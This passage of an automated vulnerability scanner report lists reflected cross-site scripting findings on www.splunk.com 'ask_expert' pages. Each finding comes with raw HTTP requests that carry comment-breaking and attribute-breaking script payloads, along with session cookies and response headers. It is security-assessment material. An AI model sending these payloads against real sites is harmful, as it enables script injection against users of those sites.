GET /pagee5a84--><script>alert(1)</script>e63bcaac2f5/ask_expert HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:11:58 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:41:58 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:41:58 GMT; path=/ ETag: d8f17efd290a71056151b6db8e77240e1296943918 Last-Modified: Sat, 05 Feb 2011 22:11:58 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18331
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload ff0af--><script>alert(1)</script>b24bec51a10 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/ask_expertff0af--><script>alert(1)</script>b24bec51a10 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:12:26 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18220
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.418. http://www.splunk.com/page/ask_expert [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/page/ask_expert
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e72c8--><script>alert(1)</script>60baae66c98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/ask_expert?e72c8--><script>alert(1)</script>60baae66c98=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:11:23 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: ed1b440906b133bac79d122949e306301296943884 Last-Modified: Sat, 05 Feb 2011 22:11:24 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34133
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 9a7f4--><script>alert(1)</script>95d8c031fc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page9a7f4--><script>alert(1)</script>95d8c031fc2/ask_expert/default/4396 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:36:23 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 23:06:23 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 23:06:23 GMT; path=/ ETag: 5e8994be735b98634123acbbdb03890c1296945383 Last-Modified: Sat, 05 Feb 2011 22:36:23 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18383
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload fa7de--><script>alert(1)</script>5b63b041d74 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/ask_expertfa7de--><script>alert(1)</script>5b63b041d74/default/4396 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:36:47 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18272
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload b8a52--><script>alert(1)</script>3547d2d94f9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/ask_expert/defaultb8a52--><script>alert(1)</script>3547d2d94f9/4396 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:37:16 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: c34c1c0a5147c476eaa02f21848d44d31296945437 Last-Modified: Sat, 05 Feb 2011 22:37:17 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34259
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2d76"><script>alert(1)</script>3d5ddbca352 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /page/ask_expert/defaultf2d76"><script>alert(1)</script>3d5ddbca352/4396 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:36:58 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 9e97e825910a89ef2fe76db31616422a1296945418 Last-Modified: Sat, 05 Feb 2011 22:36:58 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34257
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into an HTML comment. The payload ff968--><script>alert(1)</script>739ba485257 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/ask_expert/default/4396ff968--><script>alert(1)</script>739ba485257 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:38:04 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34245
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49dc8"><a>0cc82e0c8b7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /page/ask_expert/default/439649dc8"><a>0cc82e0c8b7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:37:29 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34158
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.425. http://www.splunk.com/page/ask_expert/default/4396 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/page/ask_expert/default/4396
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8eb41--><script>alert(1)</script>93274ebcacf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/ask_expert/default/4396?8eb41--><script>alert(1)</script>93274ebcacf=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:35:39 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34203
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.426. http://www.splunk.com/page/ask_expert/default/4396 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.splunk.com
Path:
/page/ask_expert/default/4396
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7b7e"><a>df87e49d911 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /page/ask_expert/default/4396?f7b7e"><a>df87e49d911=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:35:09 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34143
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 383a8--><script>alert(1)</script>74d4e36369d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
